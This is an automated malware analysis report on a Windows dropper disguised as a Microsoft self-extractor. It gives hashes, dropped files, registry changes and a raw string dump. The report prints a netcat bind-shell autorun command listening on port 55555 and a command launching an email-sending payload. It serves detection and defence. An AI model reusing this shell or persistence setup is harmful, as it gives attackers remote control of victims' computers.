HEUR:Trojan.Win32.Generic (Kaspersky), Gen:Variant.FAkeAlert.105 (AdAware), Backdoor.Win32.PcClient.FD, RemoteAdmin.Win32.NetCat.FD, SpyTool.Win32.Ardamax.FD, GenericEmailWorm.YR, RemoteAdminNetCat.YR (Lavasoft MAS)Behaviour: Trojan, Backdoor, RemoteAdmin, Worm, EmailWorm, SpyTool
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 1d23a57973153cdfb24c05c9c3c5e2f4
SHA1: 70708f86e80f2a26b522354769afb945fec8935a
SHA256: e7999726d14f963e988cc6211138ec70cf084d0ebd4e2f0b7e9aa32c94e38c20
SSDeep: 49152:1MSFFNLrUrfcnwFC4K2 vwJKcNMwAbfpH9Ou8N:ySfNLrUQnl12uYww8Oh
Size: 1906688 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: Kevin Solway
Created at: 2008-04-13 21:32:45
Analyzed on: WindowsXP SP3 32-bit
Summary: RemoteAdmin. A system tool used to allow remote access or control of computer systems.
Dynamic Analysis
Payload
Behaviour | Description |
---|---|
EmailWorm | Worm can send e-mails. |
Process activity
The RemoteAdmin creates the following process(es):
nc.exe:1932
%original file name%.exe:580
virus.exe:1224
regedit.exe:972
The RemoteAdmin injects its code into the following process(es):
ALW.exe:1160
rundll32.exe:1532
File activity
The process %original file name%.exe:580 makes changes in the file system.
The RemoteAdmin creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\IXP000.TMP\nc.exe (2025 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\IXP000.TMP\foto.jpg (1568 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\IXP000.TMP\wsetup.cmd (966 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\IXP000.TMP\virus.exe (33520 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\IXP000.TMP\INDEXH~1.TXT (122 bytes)
The process virus.exe:1224 makes changes in the file system.
The RemoteAdmin creates and/or writes to the following file(s):
%Documents and Settings%\All Users\Application Data\ITKVAP\ALW.01 (82 bytes)
%Documents and Settings%\All Users\Application Data\ITKVAP\ALW.00 (2 bytes)
%Documents and Settings%\All Users\Application Data\ITKVAP\ALW.exe (15021 bytes)
%Documents and Settings%\All Users\Application Data\ITKVAP\ALW.02 (57 bytes)
Registry activity
The process nc.exe:1932 makes changes in the system registry.
The RemoteAdmin creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FF 2C 14 48 BA 2A 49 22 43 BB E9 C6 A9 A7 D1 F8"
The process ALW.exe:1160 makes changes in the system registry.
The RemoteAdmin creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "03 AE 10 72 B9 94 99 59 34 40 69 8C 05 6E 3B 66"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
To automatically run itself each time Windows is booted, the RemoteAdmin adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"ALW Start" = "%Documents and Settings%\All Users\Application Data\ITKVAP\ALW.exe"
The process %original file name%.exe:580 makes changes in the system registry.
The RemoteAdmin creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F3 CF 8E BC 38 29 58 01 76 B3 89 D7 E9 08 6E 36"
To automatically run itself each time Windows is booted, the RemoteAdmin adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"wextract_cleanup0" = "rundll32.exe %System%\advpack.dll,DelNodeRunDLL32 C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\IXP000.TMP\"
The process virus.exe:1224 makes changes in the system registry.
The RemoteAdmin creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F9 08 85 B2 97 72 FA E1 C8 65 20 9A 2F F2 CA 5B"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\All Users\Application Data\ITKVAP]
"ALW.exe" = "ALW"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The RemoteAdmin modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The RemoteAdmin modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The RemoteAdmin modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The process regedit.exe:972 makes changes in the system registry.
The RemoteAdmin creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FB BD 4D 05 69 23 3B AA 1D FB FB 29 40 F8 7E E8"
[HKCU\Software\Microsoft\Internet Explorer\Main]
"Start Page" = "c:\windows\system32\index1.html"
To automatically run itself each time Windows is booted, the RemoteAdmin adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Update" = "c:\windows\system32\nc.exe -d -L -p 55555 -e cmd.exe"
"Virus" = "c:\windows\system32\virus.exe andrescruzvtj@hotmail.com"
The process rundll32.exe:1532 makes changes in the system registry.
The RemoteAdmin creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9C 61 02 5C 4F 7A F7 C2 27 B2 B6 74 ED 4C FC F2"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
Dropped PE files
MD5 | File path |
---|---|
1c902448ba8c2385602c8f5315f35204 | c:\Documents and Settings\All Users\Application Data\ITKVAP\ALW.01 |
d92e93f974e833bb6b9cae597fcf8a49 | c:\Documents and Settings\All Users\Application Data\ITKVAP\ALW.02 |
bb251a9f308d046931dcba40fb1e0450 | c:\Documents and Settings\All Users\Application Data\ITKVAP\ALW.exe |
e0fb946c00b140693e3cf5de258c22a1 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\IXP000.TMP\nc.exe |
6fbb7d7530f7362b5495006fc5bb7909 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\IXP000.TMP\virus.exe |
e0fb946c00b140693e3cf5de258c22a1 | c:\WINDOWS\system32\nc.exe |
6fbb7d7530f7362b5495006fc5bb7909 | c:\WINDOWS\system32\virus.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Static Analysis
VersionInfo
Company Name: Microsoft Corporation
Product Name: HD Player
Product Version: 6.00.2900.5512
Legal Copyright: (c) Microsoft Corporation. Reservados todos los derechos.
Legal Trademarks:
Original Filename: WEXTRACT.EXE
Internal Name: Wextract
File Version: 6.00.2900.5512 (xpsp.080413-2105)
File Description: Win32 Cabinet Self-Extractor
Comments:
Language: Spanish (Spain, International Sort)
Company Name: Microsoft CorporationProduct Name: HD Player Product Version: 6.00.2900.5512Legal Copyright: (c) Microsoft Corporation. Reservados todos los derechos.Legal Trademarks: Original Filename: WEXTRACT.EXE Internal Name: Wextract File Version: 6.00.2900.5512 (xpsp.080413-2105)File Description: Win32 Cabinet Self-Extractor Comments: Language: Spanish (Spain, International Sort)
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 39368 | 39424 | 4.5598 | 25b5d82208cedbbbc7ee430a4202819c |
.data | 45056 | 7140 | 1024 | 2.94449 | 99858e86526942a66950c7139f78a725 |
.rsrc | 53248 | 1867776 | 1865216 | 5.5405 | 012b992d76feb456da9e4e33b0ff74f1 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
Map
The RemoteAdmin connects to the servers at the folowing location(s):
Strings from Dumps
%original file name%.exe_580:
.text
.text
`.data
`.data
.rsrc
.rsrc
ADVAPI32.dll
ADVAPI32.dll
KERNEL32.dll
KERNEL32.dll
NTDLL.DLL
NTDLL.DLL
GDI32.dll
GDI32.dll
USER32.dll
USER32.dll
COMCTL32.dll
COMCTL32.dll
VERSION.dll
VERSION.dll
advapi32.dll
advapi32.dll
advpack.dll
advpack.dll
wininit.ini
wininit.ini
Software\Microsoft\Windows\CurrentVersion\App Paths
Software\Microsoft\Windows\CurrentVersion\App Paths
setupapi.dll
setupapi.dll
setupx.dll
setupx.dll
IXPd.TMP
IXPd.TMP
TMP4351$.TMP
TMP4351$.TMP
FINISHMSG
FINISHMSG
USRQCMD
USRQCMD
ADMQCMD
ADMQCMD
msdownld.tmp
msdownld.tmp
wextract.pdb
wextract.pdb
PSSSSSSh
PSSSSSSh
RegCloseKey
RegCloseKey
RegOpenKeyExA
RegOpenKeyExA
RegCreateKeyExA
RegCreateKeyExA
RegQueryInfoKeyA
RegQueryInfoKeyA
GetWindowsDirectoryA
GetWindowsDirectoryA
ExitWindowsEx
ExitWindowsEx
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
rundll32.exe %s,InstallHinfSection %s 128 %s
rundll32.exe %s,InstallHinfSection %s 128 %s
SHELL32.DLL
SHELL32.DLL
Software\Microsoft\Windows\CurrentVersion\RunOnce
Software\Microsoft\Windows\CurrentVersion\RunOnce
PendingFileRenameOperations
PendingFileRenameOperations
System\CurrentControlSet\Control\Session Manager\FileRenameOperations
System\CurrentControlSet\Control\Session Manager\FileRenameOperations
wextract_cleanup%d
wextract_cleanup%d
%s /D:%s
%s /D:%s
rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"
rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"
Command.com /c %s
Command.com /c %s
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\IXP000.TMP\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\IXP000.TMP\
foto.jpg
foto.jpg
INDEXH~1.TXT
INDEXH~1.TXT
nc.exe
nc.exe
virus.exe
virus.exe
wsetup.cmd
wsetup.cmd
. &.#&'&
. &.#&'&
UeXe
UeXe
9Eu%x
9Eu%x
8E%SH<</pre><pre>lO)%u</pre><pre>-]aRZ</pre><pre>}-u"=-9}</pre><pre>K.pf1</pre><pre>-K}FM</pre><pre>s.fJO}</pre><pre>.UK!R</pre><pre>%.oC3![*</pre><pre>.mKIz</pre><pre>.WY%]</pre><pre>R.lqZ</pre><pre>E.Pq}#</pre><pre>P{).ZDF</pre><pre>T%Fn:</pre><pre>2c.ncl</pre><pre>.CB!X</pre><pre>%sUvh</pre><pre>0@{%X</pre><pre>2k%uHyX9</pre><pre>'9h.nw</pre><pre>2.nKa</pre><pre>vs^f.et</pre><pre>.FBn6QN</pre><pre>38.GT</pre><pre>^*.BQ</pre><pre>1*/.zx></pre><pre>#7.iZ2j</pre><pre>.lx\,</pre><pre>4T%_%u"H</pre><pre>eAswM.hL</pre><pre>%ZW{%x6</pre><pre><q3><pre>5#h.Gu</pre><pre>n9%dO</pre><pre>.iSqO</pre><pre>ssy-)p\.FG</pre><pre>%ueT~C</pre><pre>1.lD,</pre><pre>I.TBvZ</pre><pre>7.OSW</pre><pre>%XPkvR</pre><pre>j.TMfGt</pre><pre>B*.fYx</pre><pre>{,/7[(]6</pre><pre>7=v%sc</pre><pre>j8.rf</pre><pre>E.iHS</pre><pre>,.yZ2</pre><pre>= =%D</pre><pre>.Qj`H%</pre><pre>%s;JA</pre><pre>B)L9%X</pre><pre>^5p8uLR%X.</pre><pre>*^ h%U}</pre><pre>.sGHRN</pre><pre>Ap.stt</pre><pre>.EH /</pre><pre>.kb,)q</pre><pre>wWyC^M.tKG</pre><pre>%x]X*K</pre><pre>.vh(j</pre><pre>9.JZ_3</pre><pre>lm.Fx</pre><pre>kJ8H%S</pre><pre>ZkÊ</pre><pre>bkEyQ</pre><pre>6P%s\</pre><pre>=C.ve</pre><pre>3%uCen</pre><pre>(Æ@</pre><pre> .%U=</pre><pre>.sn$j</pre><pre>67:%c</pre><pre>g.bc%</pre><pre>.Hv{i</pre><pre>ÂT7=</pre><pre>%8.wDI</pre><pre>0K%u3</pre><pre>r.iCW</pre><pre>v.FoQ</pre><pre>g}3%S</pre><pre>9B%x!</pre><pre>UkX%FU!C</pre><pre>E%uW8x</pre><pre>Hg.vbL#</pre><pre>'x$z9!.fM></pre><pre>Z9msG</pre><pre>%Sqz)</pre><pre>\Sn%D</pre><pre>w1O.kk</pre><pre>_F.uSt</pre><pre>G;crt</pre><pre>.gGwW</pre><pre>k.SZ9</pre><pre>A}%Sz</pre><pre>ky`%f</pre><pre>ht.Ic</pre><pre>p.GrYjD</pre><pre>.uhz.</pre><pre>ÓIo</pre><pre>r.Xh^</pre><pre>NWFE%X</pre><pre><p%C t><pre>,.kR~</pre><pre>K("M.WE</pre><pre>.yt7T</pre><pre>/s%x,</pre><pre>%FuPC</pre><pre>P)>%UL</pre><pre>s*Y:oójJ</pre><pre>C.bMK</pre><pre>.st2yI</pre><pre>7Cx%U</pre><pre>1_.ep</pre><pre>zt%umUw..</pre><pre>VdZ-Tw}</pre><pre>z.LTw</pre><pre>l%US#</pre><pre>.jiY>K</pre><pre>^9v%uA</pre><pre>@-tcP</pre><pre>_.oI@</pre><pre>1.Lf;</pre><pre>hw.VR</pre><pre>.aDOE</pre><pre>%s @U</pre><pre>.Lw52</pre><pre>.BGCw{</pre><pre>3.Xxd</pre><pre>S8%xK</pre><pre>%CYf;</pre><pre>.Naz(gB</pre><pre>.pDEaI</pre><pre>%b.Wr</pre><pre>.Bv L</pre><pre>2%u'?aE#</pre><pre>GsN*.xr</pre><pre>W&.BqQ</pre><pre>-J}VM></pre><pre>\.zMq</pre><pre>Ã><</pre><pre>$;.Dk</pre><pre>tQP%f</pre><pre>?7@Ï</pre><pre>h;u%S</pre><pre>n?A%S</pre><pre>6&.jT9</pre><pre>%XW`g1</pre><pre>w6.Oh</pre><pre>UR%.c</pre><pre>H.gP`</pre><pre>1%uS9U</pre><pre>JUcpa=%u</pre><pre> $%fk</pre><pre>mb%Uf</pre><pre>EeUw</pre><pre>.mGv{@</pre><pre>_.JD\</pre><pre>.aL,f</pre><pre>.Fq'></pre><pre>YKr%Sj</pre><pre>7E,%X</pre><pre>n de espacio en: %s.</pre><pre>Mensaje de sistema: %s.5No se puede encontrar uno de los recursos necesarios.#</pre><pre>n del sistema operativo./Error en la solicitud de asignaci</pre><pre>n no pudo encontrar una unidad con %s KB de espacio en disco libres para instalar el programa. Libere un poco de espacio primero y presione Reintentar, o presione Cancelar para salir del programa de instalaci</pre><pre>n.XLa carpeta no es v</pre><pre>rese de que la carpeta existe y se puede escribir en ella.DDebe especificar una carpeta con la ruta completa o elegir Cancelar.</pre><pre>n de carpeta.DNo se puede cargar las funciones requeridas por el di</pre><pre>logo Examinar.\No se pudo cargar el archivo Shell32.dll, requerido por el cuadro de di</pre><pre>n del proceso <%s>. Causa: %s5El tama</pre><pre>ster en este sistema no es soportado.3Uno de los recursos necesarios parece estar da</pre><pre>ado.[Es necesario Windows 95 o Windows NT 4.0 Beta 2 o posterior para realizar esta instalaci</pre><pre>Error al cargar %s]Error de GetProcAddress() en funci</pre><pre>n "%s". Causa posible: versi</pre><pre>n incorrecta de advpack.dll.@Es necesario Windows 95 o Windows NT para instalar este producto No se pudo crear la carpeta "%s"</pre><pre>Para instalar este programa, necesita %s KB disponibles en la unidad %s. Es recomendable que libere la cantidad necesaria de espacio en disco antes de continuar.</pre><pre>n de la carpeta de Windows</pre><pre>)Apagar NT: Error en token de OpenProcess.*Apagar NT: Error en AdjustTokenPrivileges."Apagar NT: Error en ExitWindowsEx.</pre><pre>n del archivo. Probablemente se deba a un problema de memoria baja (poco espacio en disco para el intercambio de archivos) o un archivo .CAB da</pre><pre>ado.wEl programa de instalaci</pre><pre>n del volumen para la unidad (%s) .</pre><pre>Mensaje del sistema: %s.</pre><pre>n no pudo encontrar una unidad con %s KB de espacio en disco libres para instalar el programa. Libere un poco de espacio e int</pre><pre>ntelo de nuevo.hEl programa de instalaci</pre><pre>[Otra copia del paquete "%s" ya est</pre><pre>Desea ejecutar otra copia?$No se pudo encontrar el archivo: %s.</pre><pre> No existe la carpeta "%s".</pre><pre>Desea crearla?lOtra copia del paquete "%s" ya est</pre><pre>lo es posible ejecutar una copia a la vez.OEl paquete "%s" no es compatible con la versi</pre><pre>n de Windows que est</pre><pre>ejecutando.^El paquete "%s" no es compatible con la versi</pre><pre>n del archivo %s que se encuentra en su sistema.</pre><pre>6.00.2900.5512 (xpsp.080413-2105)</pre><pre>WEXTRACT.EXE</pre><pre>Sistema operativo Microsoft</pre><pre>Windows</pre><pre>6.00.2900.5512</pre><b>cmd.exe_1116:</b><pre>.text</pre><pre>`.data</pre><pre>.rsrc</pre><pre>KERNEL32.dll</pre><pre>NTDLL.DLL</pre><pre>msvcrt.dll</pre><pre>USER32.dll</pre><pre>SetConsoleInputExeNameW</pre><pre>APerformUnaryOperation: '%c'</pre><pre>APerformArithmeticOperation: '%c'</pre><pre>ADVAPI32.dll</pre><pre>SHELL32.dll</pre><pre>MPR.dll</pre><pre>RegEnumKeyW</pre><pre>RegDeleteKeyW</pre><pre>RegCloseKey</pre><pre>RegOpenKeyW</pre><pre>RegCreateKeyExW</pre><pre>RegOpenKeyExW</pre><pre>ShellExecuteExW</pre><pre>CmdBatNotification</pre><pre>GetWindowsDirectoryW</pre><pre>GetProcessHeap</pre><pre>GetCPInfo</pre><pre>GetConsoleOutputCP</pre><pre>_pipe</pre><pre>GetProcessWindowStation</pre><pre>cmd.pdb</pre><pre>foto.jpg c:\windows\system32\virus.exe andrescruzvtj@hotmail.com</pre><pre>oto.jpg\windows\system32\virus.exe andrescruzvtj@hotmail.com</pre><pre>foto.jpgus.exe andrescruzvtj@hotmail.com</pre><pre>foto.jpgexe andrescruzvtj@hotmail.com</pre><pre>foto.jpge andrescruzvtj@hotmail.com</pre><pre>foto.jpgndrescruzvtj@hotmail.com</pre><pre>foto.jpgvirus.exe andrescruzvtj@hotmail.com</pre><pre>foto.jpg -e cmd.exe</pre><pre>start /b c:\windows\system32\virus.exe andrescruzvtj@hotmail.com</pre><pre>foto.jpg -L -p 55555 -e cmd.exe</pre><pre>foto.jpg.exe -d -L -p 55555 -e cmd.exe</pre><pre>foto.jpgxe -d -L -p 55555 -e cmd.exe</pre><pre>foto.jpg</pre><pre>foto.jpgxe andrescruzvtj@hotmail.com</pre><pre>foto.jpgm</pre><pre>foto.jpgtart /b c:\windows\system32\virus.exe andrescruzvtj@hotmail.com</pre><pre>CMD Internal Error %s</pre><pre>)(&&())))(&))</pre><pre>)&((&)&))&())</pre><pre>)&((&)&)&()))</pre><pre>)(&&()))&))))</pre><pre>CMD.EXE</pre><pre>()|&=,;"</pre><pre>COPYCMD</pre><pre>\XCOPY.EXE</pre><pre>CMDCMDLINE</pre><pre>WKERNEL32.DLL</pre><pre>Software\Policies\Microsoft\Windows\System</pre><pre>0123456789</pre><pre>cmd.exe</pre><pre>DIRCMD</pre><pre>%d.%d.d</pre><pre>Ungetting: '%s'</pre><pre>DisableCMD</pre><pre>GeToken: (%x) '%s'</pre><pre>%s\Shell\Open\Command</pre><pre>%x %c</pre><pre>*** Unknown type: %x</pre><pre>Args: `%s'</pre><pre>Cmd: %s Type: %x</pre><pre>%s (%s) %s</pre><pre>oto.jpg</pre><pre>c:\windows\system32\virus.exe andrescruzvtj@hotmail.com</pre><pre>ws\system32\nc.reg</pre><pre>32\nc.reg</pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\IXP000.TMP\foto.jpg</pre><pre>tmail.com</pre><pre>.com"</pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\IXP000.TMP></pre><pre>.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH</pre><pre>%WinDir%;%WinDir%\System32\Wbem;c:\Program Files\Wireshark</pre><pre>ows\system32\nc.reg</pre><pre>m32\nc.reg</pre><pre>c.reg</pre><pre>CMDEXTVERSION</pre><pre>KEYS</pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\IXP000.TMP</pre><pre>c:\windows\system32\virus.exe andrescruzvtj@hotmail.com</pre><pre>%s %s</pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\IXP000.TMP\virus.exe</pre><pre>(%s) %s</pre><pre>%s %s%s</pre><pre>&()[]{}^=;!%' ,`~</pre><pre>d%sd%s</pre><pre>-%sd%sd%sd</pre><pre>d%sd%sd</pre><pre>%s=%s</pre><pre>X-X</pre><pre>.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS</pre><pre><> -*/%()|^&=,</pre><pre>\CMD.EXE</pre><pre>Windows Command Processor</pre><pre>5.1.2600.5512 (xpsp.080413-2111)</pre><pre>Cmd.Exe</pre><pre>Windows</pre><pre>Operating System</pre><pre>5.1.2600.5512</pre><pre>Press any key to continue . . . %0</pre><pre>operable program or batch file.</pre><pre>The system cannot execute the specified program.</pre><pre>and press any key when ready. %0</pre><pre>Microsoft Windows XP [Version %1]%0</pre><pre>a pipe operation.</pre><pre>KEYS is on.</pre><pre>KEYS is off.</pre><pre>The process tried to write to a nonexistent pipe.</pre><pre>The switch /Y may be preset in the COPYCMD environment variable.</pre><pre>to prompt on overwrites unless COPY command is being executed from</pre><pre>Switches may be preset in the DIRCMD environment variable. Override</pre><pre>Quits the CMD.EXE program (command interpreter) or the current batch</pre><pre>CMD.EXE. If executed from outside a batch script, it</pre><pre>will quit CMD.EXE</pre><pre>ERRORLEVEL that number. If quitting CMD.EXE, sets the process</pre><pre>Displays or sets a search path for executable files.</pre><pre>Type PATH ; to clear all search-path settings and direct cmd.exe to search</pre><pre>Changes the cmd.exe command prompt.</pre><pre>$B | (pipe)</pre><pre>$V Windows XP version number</pre><pre>Displays, sets, or removes cmd.exe environment variables.</pre><pre>Displays the Windows XP version.</pre><pre>Tells cmd.exe whether to verify that your files are written correctly to a</pre><pre>Records comments (remarks) in a batch file or CONFIG.SYS.</pre><pre>Press any key to continue . . . %0</pre><pre>Directs cmd.exe to a labeled line in a batch program.</pre><pre>NOT Specifies that Windows XP should carry out</pre><pre>will execute the command after the ELSE keyword if the</pre><pre>I The new environment will be the original environment passed</pre><pre>to the cmd.exe and not the current environment.</pre><pre>SEPARATE Start 16-bit Windows program in separate memory space</pre><pre>SHARED Start 16-bit Windows program in shared memory space</pre><pre>If it is an internal cmd command or a batch file then</pre><pre>the command processor is run with the /K switch to cmd.exe.</pre><pre>If it is not an internal cmd command or batch file then</pre><pre>parameters These are the parameters passed to the command/program</pre><pre>under Windows XP.</pre><pre>Starts a new instance of the Windows XP command interpreter</pre><pre>CMD [/A | /U] [/Q] [/D] [/E:ON | /E:OFF] [/F:ON | /F:OFF] [/V:ON | /V:OFF]</pre><pre>/D Disable execution of AutoRun commands from registry (see below)</pre><pre>/A Causes the output of internal commands to a pipe or file to be ANSI</pre><pre>/U Causes the output of internal commands to a pipe or file to be</pre><pre>variable var at execution time. The %var% syntax expands variables</pre><pre>of an executable file.</pre><pre>If /D was NOT specified on the command line, then when CMD.EXE starts, it</pre><pre>either or both are present, they are executed first.</pre><pre>HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\AutoRun</pre><pre>HKEY_CURRENT_USER\Software\Microsoft\Command Processor\AutoRun</pre><pre>can enable or disable extensions for all invocations of CMD.EXE on a</pre><pre>following REG_DWORD values in the registry using REGEDT32.EXE:</pre><pre>HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\EnableExtensions</pre><pre>HKEY_CURRENT_USER\Software\Microsoft\Command Processor\EnableExtensions</pre><pre>particular invocation of CMD.EXE with the /V:ON or /V:OFF switch. You</pre><pre>can enable or disable completion for all invocations of CMD.EXE on a</pre><pre>HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\DelayedExpansion</pre><pre>HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DelayedExpansion</pre><pre>at execution time.</pre><pre>CMD.EXE with the /F:ON or /F:OFF switch. You can enable or disable</pre><pre>completion for all invocations of CMD.EXE on a machine and/or user logon</pre><pre>the registry using REGEDT32.EXE:</pre><pre>HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\CompletionChar</pre><pre>HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\PathCompletionChar</pre><pre>HKEY_CURRENT_USER\Software\Microsoft\Command Processor\CompletionChar</pre><pre>HKEY_CURRENT_USER\Software\Microsoft\Command Processor\PathCompletionChar</pre><pre>Shift key with the control character will move through the list</pre><pre>&()[]{}^=;!%' ,`~</pre><pre>Command Processor Extensions enabled by default. Use CMD /? for details.</pre><pre>ASSOC [.ext[=[fileType]]]</pre><pre>.ext Specifies the file extension to associate the file type with</pre><pre>ASSOC .pl=PerlScript</pre><pre>FTYPE PerlScript=perl.exe %%1 %%*</pre><pre>script.pl 1 2 3</pre><pre>set PATHEXT=.pl;%%PATHEXT%%</pre><pre>The restartable option to the COPY command is not supported by</pre><pre>this version of the operating system.</pre><pre>The following usage of the path operator in batch-parameter</pre><pre>The unicode output option to CMD.EXE is not supported by this</pre><pre>version of the operating system.</pre><pre>If Command Extensions are enabled the DATE command supports</pre><pre>If Command Extensions are enabled the TIME command supports</pre><pre>If Command Extensions are enabled the PROMPT command supports</pre><pre>is pretty simple and supports the following operations, in decreasing</pre><pre>! ~ - - unary operators</pre><pre>* / %% - arithmetic operators</pre><pre> - - arithmetic operators</pre><pre>&= ^= |= <<= >>=</pre><pre>If you use any of the logical or modulus operators, you will need to</pre><pre>values. If SET /A is executed from the command line outside of a</pre><pre>assignment operator requires an environment variable name to the left of</pre><pre>the assignment operator. Numeric values are decimal numbers, unless</pre><pre>occurrence of the remaining portion of str1.</pre><pre>Finally, support for delayed environment variable expansion has been</pre><pre>added. This support is always disabled by default, but may be</pre><pre>enabled/disabled via the /V command line switch to CMD.EXE. See CMD /?</pre><pre>of text is read, not when it is executed. The following example</pre><pre>So the actual FOR loop we are executing is:</pre><pre>%Í%% - expands to the current directory string.</pre><pre>%ÚTE%% - expands to current date using same format as DATE command.</pre><pre>%%CMDEXTVERSION%% - expands to the current Command Processor 